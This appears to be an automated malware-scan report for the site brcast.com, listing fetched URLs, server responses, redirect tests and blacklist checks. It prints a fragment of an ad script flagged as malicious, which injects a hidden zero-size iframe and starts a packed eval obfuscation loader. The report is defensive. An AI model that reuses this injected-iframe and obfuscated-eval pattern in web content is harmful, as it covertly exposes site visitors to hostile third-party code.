Scanned pages/files
Request | Server response | Status |
http://www.brcast.com/ | HTTP/1.1 302 Found Cache-Control: private Date: Fri, 16 Jan 2015 17:31:43 GMT Location: http://www.brcast.com/home/index Server: Microsoft-IIS/7.5 Content-Length: 149 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=esnmegnfov4h0jvncrdtvf2q; path=/; HttpOnly X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin | clean |
http://www.brcast.com/home/index | 200 OK Content-Length: 79325 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js | 200 OK Content-Length: 91342 Content-Type: text/javascript | clean |
http://www.brcast.com//s3.amazonaws.com/ki.js/40769/7Rt.js/ | 404 Not Found Content-Length: 1033 Content-Type: text/html | clean |
http://www.brcast.com/test404page.js | 404 Not Found Content-Length: 1033 Content-Type: text/html | clean |
http://carnage.spider.ad?id=3135/ | 200 OK Content-Length: 13 Content-Type: application/json | clean |
http://tag.cleverad.com.br/cleverad/adcreate.jsp?tagcode=0a0fec98-feb5-42c3-af70-098488ce9a49 | 200 OK Content-Length: 10965 Content-Type: text/html | clean |
http://ads.egrana.com.br/anuncio/popup/70 | 200 OK Content-Length: 6551 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe style="display:none" src="http://ads.egrana.com.br/stats/pop/" width="0" height="0" frameborder="0" marginwidh="0" marginheight="0" scrolling="no"></iframe>');eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+' Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: brcast.com
Result:
GET / HTTP/1.1
Host: brcast.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: brcast.com
Referer: http://www.google.com/search?q=brcast.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: brcast.com
Referer: http://www.google.com/search?q=brcast.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=brcast.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brcast.com/
Result: brcast.com is not infected or malware details are not published yet.
Result: brcast.com is not infected or malware details are not published yet.